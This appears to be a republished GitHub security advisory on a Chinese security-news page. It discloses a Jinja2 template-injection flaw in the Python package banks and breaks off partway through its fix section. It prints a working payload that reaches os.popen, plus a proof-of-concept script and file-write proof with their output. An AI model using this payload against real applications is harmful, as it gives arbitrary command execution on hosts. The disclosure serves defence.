登录
安全情报

CVE-2026-44209 - banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI

AiRedTeam

阅读时间 1 分钟
分享
📡 GitHub-Advisory · 2026-05-08

CVE-2026-44209 - banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI

CVE-2026-44209

GHSA-gphh-9q3h-jgpp HIGH pip/banks

CVE: CVE-2026-44209

Summary

banks <= 2.4.1 uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.

This is a vulnerability in how banks initializes its Jinja2 environment — not in Jinja2 itself.

Vulnerable Code

src/banks/env.py — the global Jinja2 environment is created without sandboxing:

env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    ...
)

Attack Scenario

An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to Prompt() is vulnerable. For example:

# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host

Proof of Concept

Setup:

pip install banks==2.4.1

PoC script:

from banks import Prompt

payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")

Confirmed output:

[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...

text

**File-write proof:**

from banks import Prompt

p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}")

p.text()

ls -l /tmp/rce_banks_exec

-rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec

## Impact

Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise.

## Fix

Fixed in `banks 2.4

📌 来源: GitHub-Advisory | 🆔 CVE-2026-44209 | 📅 2026-05-08

[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)